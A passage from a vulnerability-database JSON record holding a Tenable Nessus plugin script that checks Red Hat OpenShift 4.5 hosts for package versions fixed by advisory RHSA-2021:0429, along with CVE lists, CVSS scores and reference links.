'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:4.7", "cpe:/a:redhat:openshift:4.4", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "cpe:/a:redhat:openshift:4.3", "cpe:/a:redhat:openshift:4.5", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/a:redhat:openshift:4.1", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "cpe:/a:redhat:openshift:4.2", "p-cpe:/a:redhat:enterprise_linux:conmon", "cpe:/a:redhat:openshift:4.6", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-25T13:48:58", "differentElements": ["cpe", "sourceData"], "edition": 3}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "4c80858d04e123953c06335f8d1ceffa5a8ca96fa9cea65b03b8ad68d5b93d83", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-04-16T03:09:15", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-04-16T03:09:15", "references": [{"idList": ["RH:CVE-2021-21606", "RH:CVE-2021-21605", "RH:CVE-2021-21602", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2020-11979", "RH:CVE-2020-1945", "RH:CVE-2021-21610"], "type": "redhatcve"}, {"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUAPR2021", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-2640AA4E19.NASL", "JENKINS_2_276.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0719", "RHSA-2020:2618"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-04-16T03:09:15", "rev": 2, "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/15\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"CWE\", value:\"20\");\n script_xref(name:\"CWE\", value:\"22\");\n script_xref(name:\"CWE\", value:\"59\");\n script_xref(name:\"CWE\", value:\"79\");\n script_xref(name:\"CWE\", value:\"377\");\n script_xref(name:\"CWE\", value:\"502\");\n script_xref(name:\"CWE\", value:\"770\");\n script_xref(name:\"CWE\", value:\"863\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_1_el7': [\n 'rhel-7-server-ose-4.1-debug-rpms',\n 'rhel-7-server-ose-4.1-rpms',\n 'rhel-7-server-ose-4.1-source-rpms'\n ],\n 'openshift_4_1_el8': [\n 'rhocp-4.1-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_2_el7': [\n 'rhel-7-for-system-z-ose-4.2-debug-rpms',\n 'rhel-7-for-system-z-ose-4.2-rpms',\n 'rhel-7-for-system-z-ose-4.2-source-rpms',\n 'rhel-7-server-ose-4.2-debug-rpms',\n 'rhel-7-server-ose-4.2-rpms',\n 'rhel-7-server-ose-4.2-source-rpms'\n ],\n 'openshift_4_2_el8': [\n 'rhocp-4.2-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_3_el7': [\n 'rhel-7-for-system-z-ose-4.3-debug-rpms',\n 'rhel-7-for-system-z-ose-4.3-rpms',\n 'rhel-7-for-system-z-ose-4.3-source-rpms',\n 'rhel-7-server-ose-4.3-debug-rpms',\n 'rhel-7-server-ose-4.3-rpms',\n 'rhel-7-server-ose-4.3-source-rpms'\n ],\n 'openshift_4_3_el8': [\n 'rhocp-4.3-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_4_el7': [\n 'rhel-7-for-system-z-ose-4.4-debug-rpms',\n 'rhel-7-for-system-z-ose-4.4-rpms',\n 'rhel-7-for-system-z-ose-4.4-source-rpms',\n 'rhel-7-server-ose-4.4-debug-rpms',\n 'rhel-7-server-ose-4.4-rpms',\n 'rhel-7-server-ose-4.4-source-rpms'\n ],\n 'openshift_4_4_el8': [\n 'rhocp-4.4-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_6_el7': [\n 'rhel-7-for-system-z-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-debug-rpms',\n 'rhel-7-server-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-source-rpms'\n ],\n 'openshift_4_6_el8': [\n 'rhocp-4.6-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_7_el7': [\n 'rhel-7-for-system-z-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-debug-rpms',\n 'rhel-7-server-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-source-rpms'\n ],\n 'openshift_4_7_el8': [\n 'rhocp-4.7-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0429');\n}\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 